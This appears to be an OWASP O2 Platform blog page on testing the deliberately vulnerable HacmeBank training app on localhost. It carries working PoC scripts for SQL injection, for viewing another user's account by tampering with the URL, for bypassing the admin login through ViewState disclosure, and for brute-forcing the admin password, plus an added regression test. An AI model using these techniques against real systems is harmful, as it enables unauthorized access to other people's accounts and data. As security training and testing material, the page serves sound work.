OWASP O2 Platform Blog

Using O2 Platform and HacmeBank

Michael from the OWASP Costa Rica chapter wrote a great article about O2 and his first use of it to automate HacmeBank’s login sequence: Starting with OWASP O2 Platform: a short step in a long journey

In reply I wrote Using O2 with HacmeBank, which gives an overview of what you can do today with O2 + HacmeBank (and ideas for where to go next).

May 6, 2012 | .NET, HacmeBank

O2 .NET AST Scanner – HacmeBank – SQL Injection PoC

This example shows a complete trace for one of HacmeBank’s SQL injection vulnerabilities.

It was created with O2’s .NET AST Scanner (23-May-10 version), which allows the creation of a complete trace by ‘joining up’ the partial traces (for the web layer and the web services layer).

Graph with Big Picture (all nodes)

Part 1 – Exploit/Payload location

Part 2 – Web Layer trace

Part 3 – WebServices trace

Script used to ‘join’ the two traces

// add payload and link it to the first node
var urlNode = "http://127.0.0.1:57096/HacmeBank_v2_Website/aspx/login.aspx";
var postPayload = "POST payload: txtUserName";

graph.add_Node(urlNode);
graph.add_Node(postPayload);
graph.add_Edge(urlNode, postPayload);
graph.add_Edge(postPayload, graph.nodes()[0]);

// join traces that match the "method.*Ws_UserManagement.Login" regex
// with a new node called "INTERNET"

var internetNode = "INTERNET";
graph.add_Node(internetNode);

foreach(var node in graph.nodes())
    if(node.str().regEx("method.*Ws_UserManagement.Login"))
    {
        graph.add_Edge(internetNode, node);
        graph.add_Edge(node, internetNode);
    }

Source Code view of Web Layer code and trace

 

Source Code view of Web Services code and trace

July 29, 2011 | .NET, HacmeBank

HacmeBank – Unit Tests for Vulnerabilities

The following examples show how to create automated exploits and PoCs (to be later transformed into unit tests) for HacmeBank’s vulnerabilities.

This code uses O2’s WatiN integration to create an easy ‘IE automation’ scripting environment.

Install and confirm we can login

After installing HacmeBank, run the following script, which confirms that we can log in:

var ie = "about:blank".ie(0,500,750,500);
 
ie.open("http://localhost:58348/HacmeBank_v2_Website");
ie.field("txtUserName").value("jm");
ie.field("txtPassword").value("jm789");
ie.button("Submit").click();

Vulnerability: User A is able to see User B’s account details

var ie = "about:blank".ie(0,500,750,500);
 
ie.open("http://localhost:58348/HacmeBank_v2_Website");

ie.field("txtUserName").value("jm");
ie.field("txtPassword").value("jm789");
ie.button("Submit").click();
 
ie.link("My Accounts").click();
ie.link("View Transactions").click();  
 
var url = ie.url();
var payload = url.replace("5204320422040003","5204320422040001");
ie.open(payload);
 
ie.closeInNSeconds(20);

Vulnerability: SQL Injection in Login page

[Test]
public void vulnerability_Sql_Injection_in_Login_page()
{
    setup(); 
    Browser.open(StartUrl); 
    Browser.field("txtUserName").value("jv ' aaa").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").flash().click();
}

Vulnerability: SQL Injection in Accounts Details page

[Test]
public void vulnerability_Sql_Injection_in_Accounts_Details_page()
{
    setup(); 
    Browser.open(StartUrl); 
    Browser.field("txtUserName").value("jv").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").flash().click();
    Browser.link("My Accounts").flash().click();
    Browser.link("View Transactions").flash().click(); 
    Browser.open(Browser.url()+"' AAAAA ");            
}

Vulnerability: Sensitive Information Disclosure in Admin Section Login

[Test]
public void vulnerability_Sensitive_Information_Disclosure_in_Admin_Section()
{
    setup(); 
    Browser.open(StartUrl); 
    Browser.field("txtUserName").value("jv").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").click();
    Browser.link("Admin Section").flash().click();                    
 
    var response = Browser.viewState().ViewState_Values[12];
 
    Browser.field("_ctl3:txtResponse").value(response).flash();           
    Browser.button("Login").flash().click();
}
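The PoCs above drive the browser but do not assert anything, so they cannot yet act as unit tests. The following is an added example (not code from this blog or from the O2 project) that turns the ‘User A can see User B’s account details’ PoC into an NUnit regression test against a local HacmeBank, using WatiN’s own API instead of O2’s extension methods; the port, the demo credentials, the two account numbers and the assumption that the account number is rendered on the transactions page are all taken from or inferred from the scripts above.

```csharp
using System;
using NUnit.Framework;
using WatiN.Core;

// Regression test for the "User A can see User B's account details" PoC.
// It fails while HacmeBank is vulnerable and passes once the server checks
// that the requested account belongs to the logged-in user.
[TestFixture]
public class HacmeBankRegressionTests
{
    // Assumptions: local HacmeBank instance, demo user jm/jm789 and the two
    // account numbers from the PoC script (jm owns ...0003, not ...0001).
    const string StartUrl     = "http://localhost:58348/HacmeBank_v2_Website";
    const string OwnAccount   = "5204320422040003";
    const string OtherAccount = "5204320422040001";

    // Logs in and navigates to the transactions page of the user's own account.
    // Form fields are located by name, as the O2 scripts above do.
    static IE LoginAndOpenTransactions()
    {
        var ie = new IE(StartUrl);
        ie.TextField(Find.ByName("txtUserName")).TypeText("jm");
        ie.TextField(Find.ByName("txtPassword")).TypeText("jm789");
        ie.Button(Find.ByValue("Submit")).Click();
        ie.Link(Find.ByText("My Accounts")).Click();
        ie.Link(Find.ByText("View Transactions")).Click();
        return ie;
    }

    [Test]
    public void Other_users_transactions_are_not_disclosed()
    {
        using (var ie = LoginAndOpenTransactions())
        {
            // Sanity check: the own-account page must show its account number,
            // otherwise the negative assertion below would pass vacuously.
            Assert.IsTrue(ie.ContainsText(OwnAccount), "own account page did not load");

            // Same request with another user's account number in the query string
            var tampered = ie.Url.Replace(OwnAccount, OtherAccount);
            Assert.AreNotEqual(ie.Url, tampered, "URL did not carry the account number");
            ie.GoTo(tampered);

            // A fixed application must not render the other account's transactions
            Assert.IsFalse(ie.ContainsText(OtherAccount),
                "Transactions of account " + OtherAccount + " were disclosed");
        }
    }
}
```

Run it with the NUnit console or GUI runner against a freshly installed HacmeBank; the same pattern (drive the PoC, then assert on what the page must not contain) applies to the SQL injection tests above.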

Script: Fuzzing Admin password

panel.clear();
var topPanel = panel.add_Panel();

var ie = topPanel.add_IE().silent(true);
var startPage = "http://localhost:58915/HacmeBank_v2_Website/aspx/login.aspx";
Action<string> adminLogin =
    (password)=>{
            ie.open(startPage);
            ie.disableFlashing();
            ie.field("txtUserName").value("jv").flash();
            ie.field("txtPassword").value("jv789").flash();
            ie.button("Submit").click();
            ie.link("Admin Section").flash().click();
            //var secret = ie.viewState().ViewState_Values[12];
            ie.field("_ctl3:txtResponse").value(password);
            ie.button("Login").click();
            //Add logic to detect admin Login
        };

for(int i = 0; i < 10; i++)
    adminLogin("admin" + i);

//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll

July 27, 2011 | HacmeBank, IE Automation, WatiN